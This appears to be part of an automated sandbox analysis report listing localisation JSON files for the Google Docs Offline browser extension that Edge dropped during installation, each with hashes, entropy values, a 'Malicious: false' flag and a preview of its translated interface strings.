Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
